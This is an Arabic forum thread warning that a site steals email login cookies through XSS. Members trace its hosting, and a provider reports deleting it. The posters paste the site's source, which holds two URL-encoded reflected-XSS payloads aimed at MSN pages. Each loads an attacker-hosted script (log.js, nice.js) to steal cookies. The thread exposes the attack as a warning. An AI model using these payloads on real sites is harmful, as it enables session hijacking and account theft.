تحذير من موقع www.a.mlikat.com يسرق الكوكيز للبريد

[Njm-Alryiadh]

السلام عليكم .. مازالت الحرب مستمره على اطفال النت ....

قمنا بمراسلة الشركة المستضيفه للموقع ولكن اتضح انها مستضييفه فقط للدومين ....

ولا استطيع ايجاد عنوان للشركة المستضيفه الفعليه للموقع الرجاء ان كان احد يعرف عنها شي ابلااغهم فورا وبسرعه .... فمساحة الموقع تستخدم لأختراق البريد وايذاء الناس من خلاال ثغرة xss

وهذا رابط الموقع المستخدم للاختراق .. وكما نلااحظ انه يستخدم سب دومين

http://www.a.mlikat.com


اما دومين الموقع كامل http://www.mlikat.com/


بعد فتح المصدر اكتشفت التالي ...

<html>
<script>
location = "http://wereldbeker.be.msn.com/news/article/?id=150377%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3A%2F%2F %77%77%77%2E%61%2E%6D%6C%69%6B%61%74%2E%63%6F%6D%2F%6C%6F%67%2E%6A%73%3e%3c%2f%73%63%72%69%70%74%3e; "
</script>
</html>


الثغره وهي مشفره


السيرفر المستضافه عليه الموقع هذا هو ..
Name Servers:
NS3.UAE-DNS.COM
NS4.UAE-DNS.COM


بس ماقدرت اعرف العنوان حتى اقوم بتنبيه الشركه ووضع حد له ...



لذالك وجب التنبيه اخواني .... احذروا من الدخول للموقع ...

[Njm-Alryiadh]

بعد البحث والتحري هذا هو رابط السيرفر

http://208.64.29.66

[palover]

لا حول ولا قوة إلا بالله لا تلومه ياخوك طفل مثل ما قلت بس لازم يتوقف عند حده ومن على شاكلته
لكن انصحكم ياخوان بأخذ الحيطه والحذر مهما كان وراح أنزل إن شاء الله في القريب العاجل متى سمح لي وقتي بذلك شرح طرق وأساليب سرقة الكوكيز ( ليس الاستغلال ) والوقاية من هذه النوعية من الثغرات ..

دمتم.....

[عالم المبدعون]

نجم الرياض هذا ثالث موقع تبلغ عنه انه يسرق الكوكيز


كيف تعرفها ؟؟ علشان الواحد ياخذ احتياطاته بس ؟

[alzaabi]

تفضل ومعلومات صاحب السايت وصاحب الاستضافه في الصور المرفقه

سلام

[NaMr]

يارجال الحين لحد يدخل الا مواقعه وموقع سوالف وقوقل

[t7t7.com]

alzaabi واضح ان الدومين مسجل عند شركة توب لاين

والشركه المستضيف المصممون العرب عند الأخ احمد

راح ابلغه بالموضوع

[عسول]

تح توحي

ياليت تبلغه وتعلمنا النتائج خله يوقف هالطفل عند حده

[design4host]

http://www.mlikat.com/

ما عملت شي فيه بس حذفته عن بكرة ابيه واشكرك على التنبيه لانه الموقع تحت ريسيلر عندي وليس عميل لانه عملائي انتقيهم من بين الاّلف المواقع ...

اشكرك مره ثانيه على التنبيه

[Zizwar]

أخ نجم الرياض لقد ذكرت الثغرة، لكن ازل رابطها من موضوعك، الآن قد تم توقيف الصفحة لكن بذكرك الرابط جعلت مواقع اخرى تستغلها
شكرا لك على التنبيه
للمزيد يخصوص هذه الثغرة
http://www.swalif.net/softs/showthread.php?t=170480

[al7abeb]

http://www.mlikat.com/

ما عملت شي فيه بس حذفته عن بكرة ابيه واشكرك على التنبيه لانه الموقع تحت ريسيلر عندي وليس عميل لانه عملائي انتقيهم من بين الاّلف المواقع ...

اشكرك مره ثانيه على التنبيه

جزاك الله خير اخوي
و انبه الشباب ترا فيه صوره اباحيه في الموقع
ماقول لا حول و لا قوة الا بالله

[Njm-Alryiadh]

ياخوان تحذير تحذير تراه رجع ورفع الملفات حقت الاختراق من جديد بس على رابط الموقع مباشر

http://www.mlikat.com

وقام بوضع صورة اباحيه ليجعل ضعاف النفووس يبقوون في الصفحة مده اطول.... وجب التحذير

<title>mlikat6@yahoo.com</title>
<body bgcolor="000000">
<center>
<b></b><br>
<img src="http://www.mlikat.com/tryag.gif"></center>
<META HTTP-EQUIV="Refresh" CONTENT="5; URL=http://broadband.msn.com/account/rebate_center.asp?email=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.mlikat.com/nice.js%3E%3C/script%3E">



:con2:

[Mercedes]

شكرا لك على التحدير عزيزي
فعلا إنتشر هدا النوع من الأطفال هده الأيام
الله يعين

[Abo_ELleal]

لا حول ولا قوة إلا بالله

شخص غريب

هداه الله

لم يكتفي بذنب سرقة اخوانه

بل وضع صورة إباحية لتضيف إليه المزيد والمزيد

مشكور اخوي علي التنبية

[design4host]

تم حذف الموقع بالاول وتنبيه الريسيلر
الان تم حذف الاثنين

شكر ا ً للتنبيه اخواني وجزاكم الله خير